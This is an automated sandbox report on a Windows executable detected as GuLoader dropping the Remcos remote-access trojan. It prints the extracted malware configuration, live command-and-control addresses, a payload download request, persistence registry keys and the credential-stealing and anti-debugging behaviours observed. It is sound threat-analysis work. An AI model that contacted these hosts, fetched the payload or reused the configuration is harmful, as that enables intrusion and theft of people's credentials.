Windows Analysis Report
Nutzen_Unterschrift_Planen#2024.com.exe

Overview

General Information

Sample name:Nutzen_Unterschrift_Planen#2024.com.exe
Analysis ID:1520510
MD5:50ad24c74502951d0bec1507ca050c46
SHA1:392235b1cf28c1e5e5c4ce98922b472d80fb8d0c
SHA256:e4ed3892cc2c77e7de57a5fc47040118740b1a672747f72193ed065570a55b38

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • Nutzen_Unterschrift_Planen#2024.com.exe (PID: 5668 cmdline: "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe" MD5: 50AD24C74502951D0BEC1507CA050C46)
    • Nutzen_Unterschrift_Planen#2024.com.exe (PID: 6512 cmdline: "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe" MD5: 50AD24C74502951D0BEC1507CA050C46)
      • Nutzen_Unterschrift_Planen#2024.com.exe (PID: 7560 cmdline: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\ubmgcrsfyvpwitpwpupfvcprqao" MD5: 50AD24C74502951D0BEC1507CA050C46)
      • Nutzen_Unterschrift_Planen#2024.com.exe (PID: 3620 cmdline: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\fdszcjcgmdhbszdagejyggbiyhyoajw" MD5: 50AD24C74502951D0BEC1507CA050C46)
      • Nutzen_Unterschrift_Planen#2024.com.exe (PID: 712 cmdline: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\pxxsdbnaalzgvfzeppwajtwrhnqxtundeo" MD5: 50AD24C74502951D0BEC1507CA050C46)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

{"Host:Port:Password": "66.150.198.142:2700:166.150.198.142:27000:166.150.198.142:26000:166.150.198.142:28000:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I617OK", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 00000002.00000002.321700699296.00000000060D7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | |
| 00000002.00000002.321700699296.00000000060FA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | |
| 00000000.00000002.316846928075.0000000007E80000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | |
| Process Memory Space: Nutzen_Unterschrift_Planen#2024.com.exe PID: 6512 | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | |

          Stealing of Sensitive Information

          Source: Registry Key setAuthor: Joe Security: Data: Details: C0 29 BD 1E 13 EA 18 AF CD FE E6 96 26 54 8F F5 B0 8C 1F 32 A6 6C D5 9E 43 FC BD 1F FC 4B 9F 7A 82 14 23 CE FC 0A 72 1D 15 85 86 E2 6C 3A 1C 38 18 A5 82 70 14 73 8C 7A 99 74 E2 6D BB 98 89 77 D9 76 97 60 60 A9 F7 F8 C5 8C 6C F2 43 6A AC 06 36 2D 86 C1 5B D6 A2 32 7F 2D EF 1A 2B A3 1F E3 7D A3 FA 41 E0 36 63 D7 4D CE 7A 18 1F 3E EA 79 E8 A6 4C 48 B2 6A 99 06 08 5B CC D5 5C FA 42 EB , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe, ProcessId: 6512, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-I617OK\exepath
          | Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
          | --- | --- | --- | --- | --- | --- | --- | --- | --- |
          | 2024-09-27T12:58:45.334039+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49784 | 66.150.198.142 | 2700 | TCP |
          | 2024-09-27T12:58:46.349101+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49786 | 66.150.198.142 | 2700 | TCP |
          | 2024-09-27T12:58:46.395551+0200 | 2803304 | 3 | Unknown Traffic | 192.168.11.20 | 49785 | 178.237.33.50 | 80 | TCP |
          | 2024-09-27T12:58:43.810496+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49783 | 66.150.198.142 | 80 | TCP |

          AV Detection

          Source: 00000002.00000002.321700699296.00000000060D7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "66.150.198.142:2700:166.150.198.142:27000:166.150.198.142:26000:166.150.198.142:28000:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I617OK", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
          Source: Nutzen_Unterschrift_Planen#2024.com.exeReversingLabs: Detection: 26%
          Source: Yara matchFile source: 00000002.00000002.321700699296.00000000060D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.321700699296.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Nutzen_Unterschrift_Planen#2024.com.exe PID: 6512, type: MEMORYSTR
          Source: Nutzen_Unterschrift_Planen#2024.com.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,3_2_00404423
          Source: Nutzen_Unterschrift_Planen#2024.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Nutzen_Unterschrift_Planen#2024.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 0_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596D
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 0_2_004065A2 FindFirstFileW,FindClose,0_2_004065A2
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_36F710F1
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F76580 FindFirstFileExA,2_2_36F76580
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0040AE51 FindFirstFileW,FindNextFileW,3_2_0040AE51
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,4_2_00407EF8
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407898

          Networking

          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49784 -> 66.150.198.142:2700
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49786 -> 66.150.198.142:2700
          Source: Malware configuration extractorURLs: 66.150.198.142
          Source: global trafficTCP traffic: 192.168.11.20:49784 -> 66.150.198.142:2700
          Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
          Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
          Source: Joe Sandbox ViewASN Name: INTERNAP-BLOCK-4US INTERNAP-BLOCK-4US
          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.11.20:49785 -> 178.237.33.50:80
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49783 -> 66.150.198.142:80
          Source: global traffic HTTP traffic detected: GET /lOqpXUmQJccVjyn149.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: 66.150.198.142 Cache-Control: no-cache
          Source: unknownTCP traffic detected without corresponding DNS query: 66.150.198.142
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321711266597.0000000036F40000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
          Source: Nutzen_Unterschrift_Planen#2024.com.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
          Source: Nutzen_Unterschrift_Planen#2024.com.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: global trafficDNS traffic detected: DNS query: geoplugin.net
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321700699296.00000000060D7000.00000004.00000020.00020000.00000000.sdmp, Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321701674834.0000000007EA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://66.150.198.142/lOqpXUmQJccVjyn149.bin
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Nutzen_Unterschrift_Planen#2024.com.exe, 00000000.00000000.316597134782.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321687991478.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: Nutzen_Unterschrift_Planen#2024.com.exeString found in binary or memory: http://www.ebuddy.com
          Source: Nutzen_Unterschrift_Planen#2024.com.exeString found in binary or memory: http://www.imvu.com
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321711266597.0000000036F40000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321711266597.0000000036F40000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
          Source: Nutzen_Unterschrift_Planen#2024.com.exeString found in binary or memory: http://www.nirsoft.net/
          Source: Nutzen_Unterschrift_Planen#2024.com.exeString found in binary or memory: https://login.yahoo.com/config/login
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000003.00000003.316893104356.0000000002421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000003.00000003.316893104356.0000000002421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: Nutzen_Unterschrift_Planen#2024.com.exeString found in binary or memory: https://www.google.com
          Source: Nutzen_Unterschrift_Planen#2024.com.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000003.00000003.316893104356.0000000002421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000003.00000003.316893104356.0000000002421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0041183A OpenClipboard,GetLastError,DeleteFileW,3_2_0041183A
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,3_2_0040987A
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,3_2_004098E2
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,4_2_00406DFC
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_00406E9F
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,5_2_004068B5
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_004072B5

          E-Banking Fraud

          Source: Yara matchFile source: 00000002.00000002.321700699296.00000000060D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.321700699296.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Nutzen_Unterschrift_Planen#2024.com.exe PID: 6512, type: MEMORYSTR
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess Stats: CPU usage > 6%
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00401806 NtdllDefWindowProc_W,3_2_00401806
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_004018C0 NtdllDefWindowProc_W,3_2_004018C0
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_004016FD NtdllDefWindowProc_A,4_2_004016FD
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_004017B7 NtdllDefWindowProc_A,4_2_004017B7
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_00402CAC NtdllDefWindowProc_A,5_2_00402CAC
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_00402D66 NtdllDefWindowProc_A,5_2_00402D66
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 0_2_00403350 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403350
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: String function: 004169A7 appears 86 times
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: String function: 0044DB70 appears 41 times
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: String function: 004165FF appears 35 times
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: String function: 00422297 appears 42 times
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: String function: 00444B5A appears 37 times
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: String function: 00413025 appears 79 times
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: String function: 00416760 appears 69 times
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000000.00000000.316597226950.00000000007E3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebirky festivalfolket.exev+ vs Nutzen_Unterschrift_Planen#2024.com.exe
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321688063837.00000000007E3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebirky festivalfolket.exev+ vs Nutzen_Unterschrift_Planen#2024.com.exe
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000003.316868127116.0000000036921000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Nutzen_Unterschrift_Planen#2024.com.exe
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000003.316870383333.000000000610B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Nutzen_Unterschrift_Planen#2024.com.exe
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000003.316904156603.000000000612A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Nutzen_Unterschrift_Planen#2024.com.exe
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321711266597.0000000036F5B000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Nutzen_Unterschrift_Planen#2024.com.exe
          Source: Nutzen_Unterschrift_Planen#2024.com.exeBinary or memory string: OriginalFileName vs Nutzen_Unterschrift_Planen#2024.com.exe
          Source: Nutzen_Unterschrift_Planen#2024.com.exeBinary or memory string: OriginalFilename vs Nutzen_Unterschrift_Planen#2024.com.exe
          Source: Nutzen_Unterschrift_Planen#2024.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/14@1/2
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,3_2_004182CE
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 0_2_00403350 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403350
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,5_2_00410DE1
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,3_2_00418758
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,3_2_00413D4C
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,3_2_0040B58D
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeFile created: C:\Users\user\classroomsJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-I617OK
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeFile created: C:\Users\user\AppData\Local\Temp\nsbB8D7.tmpJump to behavior
          Source: Nutzen_Unterschrift_Planen#2024.com.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSystem information queried: HandleInformationJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Nutzen_Unterschrift_Planen#2024.com.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
          Source: Nutzen_Unterschrift_Planen#2024.com.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: Nutzen_Unterschrift_Planen#2024.com.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
          Source: Nutzen_Unterschrift_Planen#2024.com.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: Nutzen_Unterschrift_Planen#2024.com.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: Nutzen_Unterschrift_Planen#2024.com.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
          Source: Nutzen_Unterschrift_Planen#2024.com.exeReversingLabs: Detection: 26%
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeFile read: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_4-33207
          Source: unknownProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\ubmgcrsfyvpwitpwpupfvcprqao"
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\fdszcjcgmdhbszdagejyggbiyhyoajw"
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\pxxsdbnaalzgvfzeppwajtwrhnqxtundeo"
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\ubmgcrsfyvpwitpwpupfvcprqao"Jump to behavior
